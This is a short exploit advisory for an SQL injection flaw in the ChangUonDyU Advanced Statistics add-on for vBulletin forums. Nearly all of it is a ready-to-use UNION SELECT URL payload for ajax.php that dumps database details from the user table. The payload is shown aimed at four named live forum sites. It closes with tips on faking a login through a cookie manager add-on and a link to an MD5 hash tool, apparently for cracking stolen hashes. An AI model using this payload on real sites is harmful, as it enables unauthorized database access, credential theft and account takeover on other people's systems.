ChangUonDyU - Advanced Statistics SQL injection Vulnerability

    #####################################################################################################
    ->Vulnerability
    #####################################################################################################

    ->http://target.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

    #####################################################################################################

    ->eg: http://diendanhaiduong.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
    http://sinhvientayan.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,

    user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

    http://vietsource.net/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

    http://tuoitredonganh.vn/diendan/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

    #####################################################################################################
    [+] If vbb version 4.1.2,3,4,5 you can install addons Advanced Cookie Manager to fake login.
    [+] Md5 Hash Generator -> http://www.miraclesalad.com/webtools/md5.php
    [+] Thanks to Juno_okyo &  all VNH Group members.

    ##########################################################################################